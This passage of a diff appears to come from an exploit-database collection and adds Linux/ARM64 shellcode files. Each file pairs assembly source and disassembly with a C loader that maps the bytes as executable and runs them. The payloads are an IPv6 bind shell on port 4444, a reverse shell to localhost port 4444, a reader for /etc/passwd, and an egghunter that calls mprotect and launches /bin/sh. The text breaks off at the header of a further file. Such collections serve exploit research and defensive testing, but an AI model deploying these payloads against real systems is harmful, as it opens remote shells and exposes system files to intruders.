+"\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2"
+"\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}

shellcodes/arm/47051.c

@@ -0,0 +1,181 @@
+/*
+# Title:  Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat ipv6bindshell.s
+.section .text
+.global _start
+_start:
+    // socket(10, 1, 0)
+    mov  x0, #0x0a
+    lsr  x1, x0, #3
+    lsl  x3, x1, #2
+    mov  x2, xzr
+    mov  x8, #198
+    svc  #0x1337
+
+    // save fd
+    mvn  x4, x0
+
+    // bind(fd, &sockaddr, 28)
+    str  xzr, [sp, #-8]!
+    str  xzr, [sp, #-8]!
+    str  xzr, [sp, #-8]!
+    movz x1, #0x0a
+    movk x1, #0x5C11, lsl #16
+    str  x1, [sp, #-8]!
+    add  x1, sp, x2
+    mov  x2, #28
+    mov  x8, #200
+    svc  #0x1337
+
+    // listen(s, 2)
+    mvn  x0, x4
+    mov  x1, x3
+    mov  x8, #201
+    svc  #0x1337
+
+    // a = accept(s, 0, 0)
+    mvn  x0, x4
+    mov  x1, xzr
+    mov  x2, xzr
+    mov  x8, #202
+    svc  #0x1337
+
+    // save a
+    mvn  x4, x0
+
+    mov  x1, x3
+
+dup3:
+    // dup3(s, 2, 0)
+    // dup3(s, 1, 0)
+    // dup3(s, 0, 0)
+    mvn  x0, x4
+    lsr  x1, x1, #1
+    mov  x2, xzr
+    mov  x8, #24
+    svc  #0x1337
+    mov  x10, xzr
+    cmp  x10, x1
+    bne  dup3
+
+    // execve("/bin/sh", 0, 0)
+    mov  x3, #0x622F
+    movk x3, #0x6E69, lsl #16
+    movk x3, #0x732F, lsl #32
+    movk x3, #0x68, lsl #48
+    str  x3, [sp, #-8]!
+    add  x0, sp, x1
+    mov  x8, #221
+    svc  #0x1337
+ubuntu@ubuntu:~/works$ as -o ipv6bindshell.o ipv6bindshell.s && ld -o ipv6bindshell ipv6bindshell.o
+ubuntu@ubuntu:~/works$ objdump -d ./ipv6bindshell
+
+./ipv6bindshell:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d2800140 	mov	x0, #0xa                   	// #10
+  40007c:	d343fc01 	lsr	x1, x0, #3
+  400080:	d37ef423 	lsl	x3, x1, #2
+  400084:	aa1f03e2 	mov	x2, xzr
+  400088:	d28018c8 	mov	x8, #0xc6                  	// #198
+  40008c:	d40266e1 	svc	#0x1337
+  400090:	aa2003e4 	mvn	x4, x0
+  400094:	f81f8fff 	str	xzr, [sp,#-8]!
+  400098:	f81f8fff 	str	xzr, [sp,#-8]!
+  40009c:	f81f8fff 	str	xzr, [sp,#-8]!
+  4000a0:	d2800141 	mov	x1, #0xa                   	// #10
+  4000a4:	f2ab8221 	movk	x1, #0x5c11, lsl #16
+  4000a8:	f81f8fe1 	str	x1, [sp,#-8]!
+  4000ac:	8b2263e1 	add	x1, sp, x2
+  4000b0:	d2800382 	mov	x2, #0x1c                  	// #28
+  4000b4:	d2801908 	mov	x8, #0xc8                  	// #200
+  4000b8:	d40266e1 	svc	#0x1337
+  4000bc:	aa2403e0 	mvn	x0, x4
+  4000c0:	aa0303e1 	mov	x1, x3
+  4000c4:	d2801928 	mov	x8, #0xc9                  	// #201
+  4000c8:	d40266e1 	svc	#0x1337
+  4000cc:	aa2403e0 	mvn	x0, x4
+  4000d0:	aa1f03e1 	mov	x1, xzr
+  4000d4:	aa1f03e2 	mov	x2, xzr
+  4000d8:	d2801948 	mov	x8, #0xca                  	// #202
+  4000dc:	d40266e1 	svc	#0x1337
+  4000e0:	aa2003e4 	mvn	x4, x0
+  4000e4:	aa0303e1 	mov	x1, x3
+
+00000000004000e8 <dup3>:
+  4000e8:	aa2403e0 	mvn	x0, x4
+  4000ec:	d341fc21 	lsr	x1, x1, #1
+  4000f0:	aa1f03e2 	mov	x2, xzr
+  4000f4:	d2800308 	mov	x8, #0x18                  	// #24
+  4000f8:	d40266e1 	svc	#0x1337
+  4000fc:	aa1f03ea 	mov	x10, xzr
+  400100:	eb01015f 	cmp	x10, x1
+  400104:	54ffff21 	b.ne	4000e8 <dup3>
+  400108:	d28c45e3 	mov	x3, #0x622f                	// #25135
+  40010c:	f2adcd23 	movk	x3, #0x6e69, lsl #16
+  400110:	f2ce65e3 	movk	x3, #0x732f, lsl #32
+  400114:	f2e00d03 	movk	x3, #0x68, lsl #48
+  400118:	f81f8fe3 	str	x3, [sp,#-8]!
+  40011c:	8b2163e0 	add	x0, sp, x1
+  400120:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  400124:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary ipv6bindshell ipv6bindshell.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' ipv6bindshell.bin && echo
+\x40\x01\x80\xd2\x01\xfc\x43\xd3\x23\xf4\x7e\xd3\xe2\x03\x1f\xaa\xc8\x18\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xff\x8f\x1f\xf8\xff\x8f\x1f\xf8\xff\x8f\x1f\xf8\x41\x01\x80\xd2\x21\x82\xab\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x82\x03\x80\xd2\x08\x19\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x03\xaa\x28\x19\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xe1\x03\x03\xaa\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\x40\x01\x80\xd2\x01\xfc\x43\xd3\x23\xf4\x7e\xd3\xe2\x03\x1f\xaa"
+"\xc8\x18\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xff\x8f\x1f\xf8"
+"\xff\x8f\x1f\xf8\xff\x8f\x1f\xf8\x41\x01\x80\xd2\x21\x82\xab\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x82\x03\x80\xd2\x08\x19\x80\xd2"
+"\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x03\xaa\x28\x19\x80\xd2"
+"\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa"
+"\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xe1\x03\x03\xaa"
+"\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2"
+"\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54"
+"\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2"
+"\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}

shellcodes/arm/47052.c

@@ -0,0 +1,155 @@
+/*
+# Title:  Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat ipv6revshell.s
+.section .text
+.global _start
+_start:
+    // socket(10, 1, 0)
+    mov  x0, #0x0a
+    lsr  x1, x0, #3
+    lsl  x3, x1, #2
+    mov  x2, xzr
+    mov  x8, #198
+    svc  #0x1337
+
+    // save fd
+    mvn  x4, x0
+
+    // connect(fd, &sockaddr, 28)
+    str  xzr, [sp, #-8]!
+    mov  x1, #0x0100000000000000
+    str  x1, [sp, #-8]!
+    str  xzr, [sp, #-8]!
+    movz x1, #0x0A
+    movk x1, #0x5C11, lsl #16
+    str  x1, [sp, #-8]!
+    add  x1, sp, x2
+    mov  x2, #28
+    mov  x8, #203
+    svc  #0x1337
+
+    mov  x1, x3
+
+dup3:
+    // dup3(s, 2, 0)
+    // dup3(s, 1, 0)
+    // dup3(s, 0, 0)
+    mvn  x0, x4
+    lsr  x1, x1, #1
+    mov  x2, xzr
+    mov  x8, #24
+    svc  #0x1337
+    mov  x10, xzr
+    cmp  x10, x1
+    bne  dup3
+
+    // execve("/bin/sh", 0, 0)
+    mov  x3, #0x622F
+    movk x3, #0x6E69, lsl #16
+    movk x3, #0x732F, lsl #32
+    movk x3, #0x68, lsl #48
+    str  x3, [sp, #-8]!
+    add  x0, sp, x1
+    mov  x8, #221
+    svc  #0x1337
+ubuntu@ubuntu:~/works$ as -o ipv6revshell.o ipv6revshell.s && ld -o ipv6revshell ipv6revshell.o
+ubuntu@ubuntu:~/works$ objdump -d ./ipv6revshell
+
+./ipv6revshell:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d2800140 	mov	x0, #0xa                   	// #10
+  40007c:	d343fc01 	lsr	x1, x0, #3
+  400080:	d37ef423 	lsl	x3, x1, #2
+  400084:	aa1f03e2 	mov	x2, xzr
+  400088:	d28018c8 	mov	x8, #0xc6                  	// #198
+  40008c:	d40266e1 	svc	#0x1337
+  400090:	aa2003e4 	mvn	x4, x0
+  400094:	f81f8fff 	str	xzr, [sp,#-8]!
+  400098:	d2e02001 	mov	x1, #0x100000000000000     	// #72057594037927936
+  40009c:	f81f8fe1 	str	x1, [sp,#-8]!
+  4000a0:	f81f8fff 	str	xzr, [sp,#-8]!
+  4000a4:	d2800141 	mov	x1, #0xa                   	// #10
+  4000a8:	f2ab8221 	movk	x1, #0x5c11, lsl #16
+  4000ac:	f81f8fe1 	str	x1, [sp,#-8]!
+  4000b0:	8b2263e1 	add	x1, sp, x2
+  4000b4:	d2800382 	mov	x2, #0x1c                  	// #28
+  4000b8:	d2801968 	mov	x8, #0xcb                  	// #203
+  4000bc:	d40266e1 	svc	#0x1337
+  4000c0:	aa0303e1 	mov	x1, x3
+
+00000000004000c4 <dup3>:
+  4000c4:	aa2403e0 	mvn	x0, x4
+  4000c8:	d341fc21 	lsr	x1, x1, #1
+  4000cc:	aa1f03e2 	mov	x2, xzr
+  4000d0:	d2800308 	mov	x8, #0x18                  	// #24
+  4000d4:	d40266e1 	svc	#0x1337
+  4000d8:	aa1f03ea 	mov	x10, xzr
+  4000dc:	eb01015f 	cmp	x10, x1
+  4000e0:	54ffff21 	b.ne	4000c4 <dup3>
+  4000e4:	d28c45e3 	mov	x3, #0x622f                	// #25135
+  4000e8:	f2adcd23 	movk	x3, #0x6e69, lsl #16
+  4000ec:	f2ce65e3 	movk	x3, #0x732f, lsl #32
+  4000f0:	f2e00d03 	movk	x3, #0x68, lsl #48
+  4000f4:	f81f8fe3 	str	x3, [sp,#-8]!
+  4000f8:	8b2163e0 	add	x0, sp, x1
+  4000fc:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  400100:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary ipv6revshell ipv6revshell.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' ipv6revshell.bin && echo
+\x40\x01\x80\xd2\x01\xfc\x43\xd3\x23\xf4\x7e\xd3\xe2\x03\x1f\xaa\xc8\x18\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xff\x8f\x1f\xf8\x01\x20\xe0\xd2\xe1\x8f\x1f\xf8\xff\x8f\x1f\xf8\x41\x01\x80\xd2\x21\x82\xab\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x82\x03\x80\xd2\x68\x19\x80\xd2\xe1\x66\x02\xd4\xe1\x03\x03\xaa\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\x40\x01\x80\xd2\x01\xfc\x43\xd3\x23\xf4\x7e\xd3\xe2\x03\x1f\xaa"
+"\xc8\x18\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xff\x8f\x1f\xf8"
+"\x01\x20\xe0\xd2\xe1\x8f\x1f\xf8\xff\x8f\x1f\xf8\x41\x01\x80\xd2"
+"\x21\x82\xab\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x82\x03\x80\xd2"
+"\x68\x19\x80\xd2\xe1\x66\x02\xd4\xe1\x03\x03\xaa\xe0\x03\x24\xaa"
+"\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4"
+"\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2"
+"\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8"
+"\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}

shellcodes/arm/47053.c

@@ -0,0 +1,139 @@
+/*
+# Title:  Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat passwd.s
+.section .text
+.global _start
+_start:
+    // fd = openat(0, "/etc/passwd", O_RDONLY)
+    mov  x0, xzr
+    mov  x1, #0x7773
+    movk x1, #0x64, lsl #16
+    str  x1, [sp, #-8]!
+    mov  x1, #0x652f
+    movk x1, #0x6374, lsl #16
+    movk x1, #0x702f, lsl #32
+    movk x1, #0x7361, lsl #48
+    str  x1, [sp, #-8]!
+    add  x1, sp, x0
+    mov  x2, xzr
+    mov  x8, #56
+    svc  #0x1337
+
+    mvn  x3, x0
+
+    // read(fd, *buf, size)
+    mov  x2, #0xfff
+    sub  sp, sp, x2
+    mov  x8, xzr
+    add  x1, sp, x8
+    mov  x8, #63
+    svc  #0x1337
+
+    // write(1, *buf, size)
+    str  x0, [sp, #-8]!
+    lsr  x0, x2, #11
+    ldr  x2, [sp], #8
+    mov  x8, #64
+    svc  #0x1337
+
+    // status = close(fd)
+    mvn  x0, x3
+    mov  x8, #57
+    svc  #0x1337
+
+    // exit(status)
+    mov  x8, #93
+    svc  #0x1337
+ubuntu@ubuntu:~/works$ as -o passwd.o passwd.s && ld -o passwd passwd.o
+ubuntu@ubuntu:~/works$ objdump -d ./passwd
+
+./passwd:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	aa1f03e0 	mov	x0, xzr
+  40007c:	d28eee61 	mov	x1, #0x7773                	// #30579
+  400080:	f2a00c81 	movk	x1, #0x64, lsl #16
+  400084:	f81f8fe1 	str	x1, [sp,#-8]!
+  400088:	d28ca5e1 	mov	x1, #0x652f                	// #25903
+  40008c:	f2ac6e81 	movk	x1, #0x6374, lsl #16
+  400090:	f2ce05e1 	movk	x1, #0x702f, lsl #32
+  400094:	f2ee6c21 	movk	x1, #0x7361, lsl #48
+  400098:	f81f8fe1 	str	x1, [sp,#-8]!
+  40009c:	8b2063e1 	add	x1, sp, x0
+  4000a0:	aa1f03e2 	mov	x2, xzr
+  4000a4:	d2800708 	mov	x8, #0x38                  	// #56
+  4000a8:	d40266e1 	svc	#0x1337
+  4000ac:	aa2003e3 	mvn	x3, x0
+  4000b0:	d281ffe2 	mov	x2, #0xfff                 	// #4095
+  4000b4:	cb2263ff 	sub	sp, sp, x2
+  4000b8:	aa1f03e8 	mov	x8, xzr
+  4000bc:	8b2863e1 	add	x1, sp, x8
+  4000c0:	d28007e8 	mov	x8, #0x3f                  	// #63
+  4000c4:	d40266e1 	svc	#0x1337
+  4000c8:	f81f8fe0 	str	x0, [sp,#-8]!
+  4000cc:	d34bfc40 	lsr	x0, x2, #11
+  4000d0:	f84087e2 	ldr	x2, [sp],#8
+  4000d4:	d2800808 	mov	x8, #0x40                  	// #64
+  4000d8:	d40266e1 	svc	#0x1337
+  4000dc:	aa2303e0 	mvn	x0, x3
+  4000e0:	d2800728 	mov	x8, #0x39                  	// #57
+  4000e4:	d40266e1 	svc	#0x1337
+  4000e8:	d2800ba8 	mov	x8, #0x5d                  	// #93
+  4000ec:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary passwd passwd.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' passwd.bin && echo
+\xe0\x03\x1f\xaa\x61\xee\x8e\xd2\x81\x0c\xa0\xf2\xe1\x8f\x1f\xf8\xe1\xa5\x8c\xd2\x81\x6e\xac\xf2\xe1\x05\xce\xf2\x21\x6c\xee\xf2\xe1\x8f\x1f\xf8\xe1\x63\x20\x8b\xe2\x03\x1f\xaa\x08\x07\x80\xd2\xe1\x66\x02\xd4\xe3\x03\x20\xaa\xe2\xff\x81\xd2\xff\x63\x22\xcb\xe8\x03\x1f\xaa\xe1\x63\x28\x8b\xe8\x07\x80\xd2\xe1\x66\x02\xd4\xe0\x8f\x1f\xf8\x40\xfc\x4b\xd3\xe2\x87\x40\xf8\x08\x08\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x23\xaa\x28\x07\x80\xd2\xe1\x66\x02\xd4\xa8\x0b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xe0\x03\x1f\xaa\x61\xee\x8e\xd2\x81\x0c\xa0\xf2\xe1\x8f\x1f\xf8"
+"\xe1\xa5\x8c\xd2\x81\x6e\xac\xf2\xe1\x05\xce\xf2\x21\x6c\xee\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x63\x20\x8b\xe2\x03\x1f\xaa\x08\x07\x80\xd2"
+"\xe1\x66\x02\xd4\xe3\x03\x20\xaa\xe2\xff\x81\xd2\xff\x63\x22\xcb"
+"\xe8\x03\x1f\xaa\xe1\x63\x28\x8b\xe8\x07\x80\xd2\xe1\x66\x02\xd4"
+"\xe0\x8f\x1f\xf8\x40\xfc\x4b\xd3\xe2\x87\x40\xf8\x08\x08\x80\xd2"
+"\xe1\x66\x02\xd4\xe0\x03\x23\xaa\x28\x07\x80\xd2\xe1\x66\x02\xd4"
+"\xa8\x0b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}

shellcodes/arm/47054.c

@@ -0,0 +1,146 @@
+/*
+# Title:  Linux/ARM64 - Egghunter (PWN!PWN!) + execve("/bin/sh", NULL, NULL) + mprotect() Shellcode (88 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat egghunter.s
+.section .text
+.global _start
+
+_start:
+    mov  x8, #226               // Systemcall Number = x8 = 226 (mprotect)
+    lsr  x2, x8, #5             // args[2] = x2 = 7 = PROT_READ|PROT_WRITE|PROT_EXEC
+    add  x1, x2, #0xff9         // args[1] = x1 = 0x1000
+    mov  x10, xzr               // Start address of scannning = x10 = 0x0000000000000000
+    mov  x11, #0x5750           // Eggtag = x11 = 0x0000000000005750
+    movk x11, #0x214E, lsl #16  // Eggtag = x11 = 0x00000000214E5750
+    add  x11, x11, x11, lsl #32 // Eggtag = x11 = 0x214E5750214E5750 = "!NWP!NWP"
+jump_search_page:
+    tbz  x8, #63, search_page   // In this code, the top bit of x8 register is always zero. Jump to address of search_page
+
+jump_shellcode:
+    br   x10                    // Jump to shellcode
+
+hunt:
+    add  x13, x10, x1           // End address of current page = x13
+next_address:
+    ldr  x12, [x10], #8         // Load value from the address pointed by x10 to x12 and add 8 to x10
+    cmp  x11, x12               // Compare loaded value and eggtag.
+    beq  jump_shellcode         // If loaded value matched to eggtag, jump to the address of jump_shellcode part.
+    cmp  x10, x13               // Check if current searching address (x10) over end address of current page (x13).
+    bge  jump_search_page       // If x10 was over x13, search next valid page.
+    sub  x10, x10, x2           // x10 = x10 - 7. This instruction is for search memory address 1 byte by 1 byte.
+    b    next_address           // Check next memory address.
+
+search_page:
+    // mprotect(*buf, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC)
+    add  x0, x10, xzr           // args[0] = x0 = x10 + xzr = x10
+    svc  #0x1337                // Invoke mprotect().
+    tbz  x0, #63, hunt          // If return value is positive, jump to hunt label location.
+    add  x10, x10, x1           // Next page address = x10 + x1 = x10 + 0x1000
+    b    search_page            // Check next page address.
+ubuntu@ubuntu:~/works$ as -o egghunter.o egghunter.s && ld -o egghunter egghunter.o
+ubuntu@ubuntu:~/works$ objdump -d ./egghunter
+
+./egghunter:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d2801c48 	mov	x8, #0xe2                  	// #226
+  40007c:	d345fd02 	lsr	x2, x8, #5
+  400080:	913fe441 	add	x1, x2, #0xff9
+  400084:	aa1f03ea 	mov	x10, xzr
+  400088:	d28aea0b 	mov	x11, #0x5750                	// #22352
+  40008c:	f2a429cb 	movk	x11, #0x214e, lsl #16
+  400090:	8b0b816b 	add	x11, x11, x11, lsl #32
+
+0000000000400094 <jump_search_page>:
+  400094:	b6f80148 	tbz	x8, #63, 4000bc <search_page>
+
+0000000000400098 <jump_shellcode>:
+  400098:	d61f0140 	br	x10
+
+000000000040009c <hunt>:
+  40009c:	8b01014d 	add	x13, x10, x1
+
+00000000004000a0 <next_address>:
+  4000a0:	f840854c 	ldr	x12, [x10],#8
+  4000a4:	eb0c017f 	cmp	x11, x12
+  4000a8:	54ffff80 	b.eq	400098 <jump_shellcode>
+  4000ac:	eb0d015f 	cmp	x10, x13
+  4000b0:	54ffff2a 	b.ge	400094 <jump_search_page>
+  4000b4:	cb02014a 	sub	x10, x10, x2
+  4000b8:	17fffffa 	b	4000a0 <next_address>
+
+00000000004000bc <search_page>:
+  4000bc:	8b1f0140 	add	x0, x10, xzr
+  4000c0:	d40266e1 	svc	#0x1337
+  4000c4:	b6fffec0 	tbz	x0, #63, 40009c <hunt>
+  4000c8:	8b01014a 	add	x10, x10, x1
+  4000cc:	17fffffc 	b	4000bc <search_page>
+ubuntu@ubuntu:~/works$ objcopy -O binary egghunter egghunter.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' egghunter.bin && echo
+\x48\x1c\x80\xd2\x02\xfd\x45\xd3\x41\xe4\x3f\x91\xea\x03\x1f\xaa\x0b\xea\x8a\xd2\xcb\x29\xa4\xf2\x6b\x81\x0b\x8b\x48\x01\xf8\xb6\x40\x01\x1f\xd6\x4d\x01\x01\x8b\x4c\x85\x40\xf8\x7f\x01\x0c\xeb\x80\xff\xff\x54\x5f\x01\x0d\xeb\x2a\xff\xff\x54\x4a\x01\x02\xcb\xfa\xff\xff\x17\x40\x01\x1f\x8b\xe1\x66\x02\xd4\xc0\xfe\xff\xb6\x4a\x01\x01\x8b\xfc\xff\xff\x17
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char stager[] =
+"\x48\x1c\x80\xd2\x02\xfd\x45\xd3\x41\xe4\x3f\x91\xea\x03\x1f\xaa"
+"\x0b\xea\x8a\xd2\xcb\x29\xa4\xf2\x6b\x81\x0b\x8b\x48\x01\xf8\xb6"
+"\x40\x01\x1f\xd6\x4d\x01\x01\x8b\x4c\x85\x40\xf8\x7f\x01\x0c\xeb"
+"\x80\xff\xff\x54\x5f\x01\x0d\xeb\x2a\xff\xff\x54\x4a\x01\x02\xcb"
+"\xfa\xff\xff\x17\x40\x01\x1f\x8b\xe1\x66\x02\xd4\xc0\xfe\xff\xb6"
+"\x4a\x01\x01\x8b\xfc\xff\xff\x17";
+
+// Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)
+char shell[] =
+"PWN!PWN!"
+"\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b"
+"\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(stager));
+
+    void *ptr1 = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr1 == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    void *ptr2 = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr2 == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr1, stager, sizeof(stager));
+    memcpy(ptr2, shell, sizeof(shell));
+    sc = ptr1;
+
+    sc();
+
+    return 0;
+}

shellcodes/arm/47055.c

@@ -0,0 +1,102 @@
